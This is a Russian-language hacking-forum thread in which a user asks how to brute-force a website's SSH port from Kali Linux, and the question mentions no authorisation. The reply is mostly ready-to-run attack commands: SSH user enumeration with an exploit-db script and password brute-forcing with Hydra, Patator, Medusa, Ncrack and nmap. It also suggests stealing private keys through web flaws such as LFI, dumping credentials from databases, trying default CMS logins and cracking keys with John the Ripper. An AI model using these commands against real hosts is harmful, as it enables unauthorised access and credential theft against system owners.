• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

ssh брут

Dogoda

Active member
06.07.2022
30
1
BIT
0
Все привет.
как , и чем правильно брутить ssh порт сайта из Kali linux?
 

Rukh

Green Team
04.05.2022
18
4
BIT
8
Если будет интересно, распишу подробнее в какой-нить статье.
Ниже то, что стоит проработать.

- используемые wordlists выбираются индивидуально. Для того, чтобы посмотреть, что у вас есть в системе, наберите locate wordlist --> отобразится большой список файлов со словом wordlist
Вам пригодятся те, что с passwords и usernames. Можно самому делать словари, crunch -
Отдельно вот Вам на списки

1) Перебор пользователей
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/seclists/Usernames/Names/names.txt 10.10.1.1

2) Граб служб (например ответом может быть: SSH-2.0-OpenSSH_3.9p1 )
- далее можно искать через searchsploit OpenSSH 3.9p1 рекомендации.
nmap -sV -p 22 10.10.1.1 . Позже можно глянуть что такое RustScan - ссыль
- порт ssh не только 22

3) Patator - имеет модуль ssh_login
patator ssh_login host=10.10.1.1 user=FILE0 0=user.txt password=FILE1 1=pass.txt

4) Hydra -
hydra -l admin -P <passlist.txt> 10.10.1.1 -t 4 ssh
hydra -L <userlist.txt> -P <passlist.txt> 10.10.1.1 ssh

5) Mesuza - имеет модуль ssh.mod
medusa -h 10.10.1.1 -U userlist.txt -P passlist.txt -M ssh

6) Ncrack -
ncrack –v –U userlist.txt –P passlist.txt 10.10.1.1:22

7) nmap (zenmap тоже самое) -
nmap 10.10.1.1 -p 22 --script ssh-brute --script-args userdb=userlist.txt,passdb=passlist.txt

---

Помните, что брут - это гадость, которая делается, когда Вы точно попробовали всё остальное.

  • Собственно, всё остальное: LFI, RFI, IDOR, XXE, SSRF, XSS, CSRF и пр.
  • Также можно получить логины пароли из БД, т.к. часто логины-пароли могут совпадать с основной системой. Это уже с помощью sql-приблуд.
  • Пробуйте в админках дефолтные для cms данные для ввода, люди ленивы.
  • Возможно до брута получится через уязвимости в вебе сайта получить rsa ключи.
    • По умолчанию лежат здесь:
      • $user/.ssh/id_rsa
      • $user/.ssh/authorized key
      • Брутятся rsa с помощью john the ripper /usr/share/john/ssh2john.py
Брутить ssh можно и на bash и на netcat, но надо понимать, зачем Вы это делаете.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!